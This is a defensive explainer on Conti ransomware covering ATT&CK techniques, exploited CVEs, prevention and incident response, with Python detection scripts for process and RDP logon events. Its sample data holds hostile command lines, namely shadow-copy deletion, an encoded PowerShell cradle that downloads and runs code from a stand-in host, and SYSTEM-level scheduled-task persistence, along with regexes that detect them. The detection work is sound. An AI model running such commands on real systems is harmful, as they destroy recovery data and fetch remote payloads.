Conti Ransomware

Conti is a ransomware family first observed in December 2019. It is known for the speed with which its operators move through a compromised network and for encrypting large numbers of systems in a short time; the encryptor itself is multithreaded and can be pointed at specific hosts or network shares over SMB rather than only at the local disk.

Conti uses multiple attack methods to spread, including exploiting vulnerabilities in Remote Desktop Protocol (RDP) connections and using stolen credentials to gain access to systems. Once it infects a system, the ransomware encrypts files and demands a ransom payment in exchange for the decryption key.

Conti is also known for its use of double extortion, which means that it not only encrypts files but also exfiltrates sensitive data from the infected system. The attackers then threaten to publicly release the stolen data if the ransom is not paid.

Conti is considered a significant threat to organizations, as it can halt business operations outright and lead to significant financial losses. Organizations should implement robust security measures, such as multi-factor authentication for all remote access, prompt patching of internet-facing systems, and offline, tested backups so that data can be restored without paying.

The Conti Group

The Conti group is a cyber criminal organization responsible for the development and distribution of the Conti ransomware. The group is known for its highly sophisticated and advanced techniques, as well as its use of double extortion tactics.

The group is reported to have been active since at least December 2019 and is known for targeting large organizations, including healthcare providers, municipalities, and government agencies. They are known for their aggressive tactics, including stealing and threatening to leak sensitive data if the ransom is not paid.

The group is also known for its use of various tactics to evade detection, including using custom-built malware, using multiple layers of encryption and making use of obfuscation techniques.

Due to its aggressive tactics, the Conti group is considered a significant threat to organizations, and it is recommended that organizations take proactive steps to prevent infection, such as implementing robust security measures, regular patching and monitoring of their networks, and having a solid incident response plan in place.

Conti Ransomware as a Service?

Conti has been widely characterised, including in CISA's September 2021 advisory AA21-265A, as a ransomware-as-a-service (RaaS) operation, although with a twist on the usual affiliate model: the core group is reported to have paid the people deploying the ransomware a wage rather than a percentage of each ransom. Intrusions were carried out by a mix of in-house operators and affiliates, and initial access was frequently bought from, or shared with, other criminal malware operations.

The group's internal chat logs and ransomware source code were leaked publicly in early 2022, so the encryptor can now be built and deployed by anyone who obtains the leak, without any approval from, or association with, the original group. It is not clear how many such actors exist or whether they can replicate the original group's tradecraft.

A leaked code base does not transfer the skill, infrastructure or intent of the group that wrote it; copycats may be far less capable, or may simply use the Conti name in ransom notes to add pressure. For defenders the distinction matters less than the tooling: the same encryptor, the same shadow-copy deletion and the same extortion playbook have to be detected and recovered from whoever is running them.

Why Conti is so dangerous

Conti is particularly dangerous for several reasons:

  • Highly sophisticated and advanced techniques: Conti uses multiple attack methods to spread, including exploiting vulnerabilities in Remote Desktop Protocol (RDP) connections and using stolen credentials to gain access to systems. It also uses advanced techniques to evade detection and make it harder for victims to recover from an attack.
  • Double extortion: Conti is known for its use of double extortion, which means that it not only encrypts files but also exfiltrates sensitive data from the infected systems before encryption. The attackers then threaten to publicly release the stolen data if the ransom is not paid. This removes backups as a complete answer: even a victim who restores everything still faces the leak, and paying offers no guarantee that the copy held by the attackers is deleted.
  • Aggressive tactics: The Conti group is known for its aggressive tactics, including stealing and threatening to leak sensitive data if the ransom is not paid. This puts pressure on victims to pay the ransom, as they may be concerned about the potential reputational damage or legal repercussions of having sensitive data leaked.
  • Targeting large organizations: The Conti group is known for targeting large organizations, including healthcare providers, municipalities, and government agencies. These organizations often have more sensitive data and more to lose from an attack, making them more likely to pay a ransom.
  • High Ransom: The Conti group is known for demanding large ransoms, and in some cases, it has been reported that the group has demanded millions of dollars.

Mapping Conti to MITRE ATT&CK

  • T1078 – Valid Accounts and T1133 – External Remote Services: initial access over internet-exposed RDP and VPN services using stolen, phished, brute-forced or weak credentials. Exploiting an unpatched service for the same purpose falls under T1190 – Exploit Public-Facing Application.
  • T1566 – Phishing: spearphishing attachments and links delivering a loader that hands the operators an interactive foothold.
  • T1021 – Remote Services: lateral movement inside the network over RDP (T1021.001) and SMB/Windows admin shares (T1021.002), which is also how the encryptor is pushed to many hosts at once.
  • T1059.001 – Command and Scripting Interpreter: PowerShell (the older ID T1086 – PowerShell was retired and merged into this sub-technique): used to download and execute payloads and stage tooling, often as encoded commands to hide the script from casual inspection of the command line.
  • T1112 – Modify Registry: Conti is known to modify the registry on infected systems in order to persist and evade detection.
  • T1053.005 – Scheduled Task/Job: Scheduled Task: scheduled tasks are used to maintain persistence on an infected system, allowing tooling to run again after a reboot.
  • T1074 – Data Staged: collected data is gathered in a staging location before it leaves the network; the exfiltration itself is a separate technique, commonly T1567.002 – Exfiltration to Cloud Storage, with tools such as Rclone pushing archives to cloud file-sharing services. The stolen data is later used to pressure the victim into paying.
  • T1055 – Process Injection: Conti is known to inject its code into legitimate processes to evade detection.
  • T1057 – Process Discovery: Conti enumerates running processes and services before encryption, both to find security tools to evade and to identify services (databases, backup agents) that hold files open and must be stopped (T1489 – Service Stop) so those files can be encrypted.
  • T1490 – Inhibit System Recovery: Volume Shadow Copies are deleted (for example via vssadmin or wmic) before encryption starts so that local restore points cannot be used for recovery.
  • T1486 – Data Encrypted for Impact: the encryption of files across local disks and reachable network shares that makes the attack visible.
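Three of the mapped techniques leave very recognisable process command lines, so they make a good first detection set. The following is an added example of that detection logic, not Conti code and not code from the original page; it runs over constructed events shaped like Sysmon Event ID 1 (Image, CommandLine), and every value in them, including the loader.example.invalid hostname, is made up for the demo.

```python
"""Process-creation detections for three of the ATT&CK techniques mapped above:
shadow-copy deletion (T1490), encoded PowerShell (T1059.001) and a scheduled
task created to run as SYSTEM (T1053.005). Added example: not Conti code and
not from the original page. Events are constructed in the shape of Sysmon
Event ID 1 (Image, CommandLine); every value below is made up for the demo."""
import base64
import re

# Constructed payload for the PowerShell event: a download cradle pointing at a
# reserved .invalid hostname, encoded the way -EncodedCommand expects (UTF-16LE,
# then base64). Built at import time so no base64 has to be typed by hand.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://loader.example.invalid/s.ps1')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users"},                      # benign
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet"},       # T1490
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic shadowcopy delete"},                        # T1490
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + _ENCODED},  # T1059.001
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /Create /SC ONLOGON /TN "Updater" /TR "C:\ProgramData\upd.exe" /RU SYSTEM /F'},  # T1053.005
]

# (technique, description, pattern matched against the command line)
RULES = [
    ("T1490", "Inhibit System Recovery: volume shadow copies deleted",
     re.compile(r"(?i)\bvssadmin(?:\.exe)?\s+delete\s+shadows\b"
                r"|\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b"
                r"|\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b")),
    ("T1053.005", "Scheduled Task created to run as SYSTEM",
     re.compile(r"(?i)\bschtasks(?:\.exe)?\s+/create\b.*\s/ru\s+\"?(?:nt\s+authority\\)?system\b")),
]

# -EncodedCommand and its short forms, followed by a base64 blob
ENCODED_PS = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_powershell(cmdline: str):
    """Return the decoded script behind -EncodedCommand / -enc / -e, or None.
    PowerShell expects base64 of UTF-16LE text, which is why a plain base64
    decode of such a blob shows text with NUL bytes between the characters."""
    m = ENCODED_PS.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(event: dict) -> list:
    """Return (technique, description, detail) hits for one process event."""
    cmd = event.get("CommandLine", "")
    hits = [(tech, desc, cmd) for tech, desc, rx in RULES if rx.search(cmd)]
    decoded = decode_encoded_powershell(cmd)
    if decoded is not None:
        # Surface the decoded script itself so the analyst sees the download
        # cradle, not just an opaque base64 blob.
        hits.append(("T1059.001", "Encoded PowerShell command", decoded))
    return hits


def scan(events) -> list:
    """Run every rule over a sequence of events, preserving event order."""
    return [hit for ev in events for hit in detect(ev)]


if __name__ == "__main__":
    for tech, desc, detail in scan(SAMPLE_EVENTS):
        print(f"[{tech}] {desc}: {detail}")
```

In a real deployment the event source is Sysmon or an EDR's process telemetry rather than a list of dicts, and the shadow-copy rule in particular should page someone: legitimate administrators very rarely delete all shadow copies quietly, and on a Conti intrusion it is one of the last things to happen before encryption starts.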

Conti Vulnerabilities

Conti operators and affiliates exploited a number of publicly known vulnerabilities, tracked as CVEs, to gain initial access or to escalate privileges once inside. The list below corrects the descriptions of the identifiers cited for Conti; only the Windows ones at the end are explicitly tied to Conti in CISA's advisory, the others are vulnerabilities widely abused by ransomware crews of the same period:

  • CVE-2019-0708 (BlueKeep): a pre-authentication remote code execution flaw in Remote Desktop Services on older Windows versions. In practice exposed RDP has far more often been abused with valid or guessed credentials than exploited, so patching it does not remove the need for MFA in front of RDP.
  • CVE-2019-11510: a pre-authentication arbitrary file read in Pulse Connect Secure VPN appliances, not code execution. It exposes cached credentials and session data, which is all an attacker needs to log in to the VPN as a legitimate user.
  • CVE-2020-10189: this identifier is a deserialization remote code execution flaw in Zoho ManageEngine Desktop Central, not a Fortinet bug. The FortiOS SSL VPN web portal flaw commonly seen in ransomware intrusions is CVE-2018-13379, a path traversal that discloses VPN credentials from the portal.
  • CVE-2020-1472 (Zerologon): a cryptographic flaw in Netlogon (MS-NRPC) authentication that lets an unauthenticated attacker with network access to a domain controller reset the domain controller's machine account password and escalate to domain administrator. CISA reports Conti actors using it.
  • CVE-2021-34527 (PrintNightmare): a remote code execution and privilege escalation flaw in the Windows Print Spooler service, also reported by CISA as used by Conti actors to escalate privileges and move laterally.

How Conti gets onto a network

  • Remote Desktop Protocol (RDP) vulnerabilities: Conti is known to exploit vulnerabilities in RDP connections to gain access to systems. This can include using weak or easily guessed credentials, or exploiting unpatched vulnerabilities in the RDP software.
  • Phishing: Phishing is a common tactic used by attackers to trick victims into providing sensitive information or clicking on a malicious link. Once a victim clicks on a link, the malware can be downloaded and installed onto the victim’s system.
  • Software vulnerabilities: Conti may also take advantage of vulnerabilities in software, such as unpatched web browsers, plugins, or operating systems.
  • Stolen credentials: The group is also known for using stolen credentials, such as login information obtained through previous data breaches or phishing campaigns, to gain access to systems.
  • Remote Access Trojan (RAT): The group may use a RAT to gain a foothold in the system, which is a type of malware that allows attackers to gain unauthorized access and control over a victim’s computer or device.
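The RDP and stolen-credential routes above both show up in the same place: Windows Security events for failed (4625) and successful (4624) RemoteInteractive logons. The following is an added example of detection logic over such events, not from the page and not from any Conti tooling; the log lines are constructed in a simplified "timestamp event_id key=value" form, with 203.0.113.7 as a documentation-range address standing in for an internet-facing source.

```python
"""Spotting RDP credential attacks in Windows Security events: a burst of failed
logons (4625) from one source, and a successful logon (4624) from that same
source while the burst is still in the window, which is the moment a stolen or
guessed password starts working. Added example; log lines are constructed and
use a simplified 'timestamp event_id key=value ...' layout. LogonType 10 is
RemoteInteractive, i.e. RDP."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_THRESHOLD = 10            # failures from one source within WINDOW -> alert
WINDOW = timedelta(minutes=5)

# Constructed events (not real logs), in time order.
SAMPLE_EVENTS = (
    [f"2023-01-09T02:10:{i:02d} 4625 user=user{i % 4} src=203.0.113.7 logontype=10"
     for i in range(1, 13)]                                                      # 12 failures, 4 accounts
    + ["2023-01-09T02:10:40 4624 user=svc-backup src=203.0.113.7 logontype=10"]  # then a success
    + ["2023-01-09T09:00:00 4625 user=alice src=10.0.0.5 logontype=10",          # one typo, then
       "2023-01-09T09:00:30 4624 user=alice src=10.0.0.5 logontype=10"]          # a normal logon
)


def parse(line: str) -> dict:
    """Parse one constructed log line into a dict with a datetime and int id."""
    ts, event_id, *kv = line.split()
    fields = dict(part.split("=", 1) for part in kv)
    return {"time": datetime.fromisoformat(ts), "id": int(event_id), **fields}


def detect_rdp_credential_attacks(lines) -> list:
    """Single stateful pass over time-ordered events. Alerts:
      ("brute_force", src, distinct_users): once per source, when FAIL_THRESHOLD
        RDP failures land within WINDOW; distinct_users separates password
        spraying (many accounts) from hammering one account.
      ("success_after_failures", src, user): an RDP success while a burst from
        the same source is still inside the window."""
    failures = defaultdict(deque)      # src -> timestamps of recent failures
    users_tried = defaultdict(set)     # src -> accounts seen failing
    flagged = set()
    alerts = []
    for ev in map(parse, lines):
        if ev.get("logontype") != "10":
            continue                   # only RemoteInteractive (RDP) logons
        src = ev["src"]
        q = failures[src]
        while q and ev["time"] - q[0] > WINDOW:
            q.popleft()                # expire failures outside the window
        if ev["id"] == 4625:
            q.append(ev["time"])
            users_tried[src].add(ev["user"])
            if len(q) >= FAIL_THRESHOLD and src not in flagged:
                flagged.add(src)
                alerts.append(("brute_force", src, len(users_tried[src])))
        elif ev["id"] == 4624 and len(q) >= FAIL_THRESHOLD:
            alerts.append(("success_after_failures", src, ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_credential_attacks(SAMPLE_EVENTS):
        print(alert)
```

The second alert is the one to treat as an incident rather than noise: a success from a source that was just brute-forcing is a compromised account, and the response is to disable the account and block the source, not merely to raise the lockout threshold. Feeding this from Windows Event Forwarding or an EDR, and adding a check that the source address is outside the organisation's own ranges, turns it into a practical rule.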

Preventing an attack

There are several steps organizations can take to keep Conti out of their network; none of them are specific to Conti, they are the same controls that stop any ransomware operator who arrives through phishing, exposed remote access or an unpatched edge device:

  • Patch management: Regularly update and patch software, including operating systems, web browsers, and plugins to protect against known vulnerabilities.
  • Multi-factor authentication: Implement multi-factor authentication for remote access, including RDP connections, to make it harder for attackers to gain access to systems using stolen credentials.
  • Segmentation: Segment your network to limit the spread of the ransomware and make it easier to isolate and contain an attack.
  • Backups: Regularly back up important data and keep at least one copy offline or immutable, reachable with credentials that are not used anywhere else; backups that are mounted as network shares or synchronised to cloud storage with the same domain credentials will be found and encrypted or deleted along with everything else. Test restores regularly, since a backup that has never been restored is an assumption, not a control.
  • Security awareness training: Educate employees on how to identify and avoid phishing attempts and other social engineering tactics used by attackers.
  • Network monitoring: Regularly monitor your network for signs of unusual activity or attempts to connect to known malicious IP addresses.
  • Security controls: Use security controls, such as antivirus and firewall, to protect against malware and other cyber threats.

When Conti Strikes

When an organization is hit with the Conti ransomware, it is important to take immediate action to contain and mitigate the damage. Here are some steps that organizations can take:

  • Isolate the affected systems: Disconnect them from the network (pull the cable, disable the adapter, or quarantine through EDR or the switch port) rather than powering them off, so that volatile evidence and the encryptor's state are preserved for forensics. Disable the accounts the attackers were using and consider blocking outbound traffic at the perimeter to cut command-and-control and exfiltration channels.
  • Assess the damage: Determine which hosts, shares and backups were encrypted, when the intrusion started (operators are usually present in the network for days before encryption) and what data was taken, since the extortion threat rests on the exfiltrated data. This informs both the recovery plan and any decision about negotiating.
  • Restore from backups: Confirm that backups are intact and were not reachable from the compromised accounts, since Conti operators actively look for and delete them. Rebuild or verifiably clean affected systems before restoring data onto them, and keep an image of the encrypted systems in case a decryptor becomes available later.
  • Paying the ransom: Paying is discouraged by law enforcement; it funds further attacks, gives no guarantee of a working decryptor, does not guarantee that stolen data is deleted, and payments to sanctioned entities can be unlawful. If it is considered anyway, involve legal counsel and law enforcement first and test any decryptor on copies of encrypted files before relying on it.
  • Contact law enforcement: Report the attack to the relevant law enforcement agencies; this can help in identifying the attackers, may provide intelligence on the group's current tooling, and in some cases leads to recovered funds or decryption keys.
  • Review your security measures: Once the attack has been contained, identify the initial access vector, the credentials and persistence mechanisms the attackers used, and close them. Assume every credential the attackers could reach is compromised: reset all account passwords, including service accounts, and if the domain was compromised reset the krbtgt account password twice so that forged Kerberos tickets stop working.

It’s important to note that these steps may vary depending on the organization and the extent of the attack, but the most important is to have a robust incident response plan in place, and to be prepared to act quickly in the event of an attack.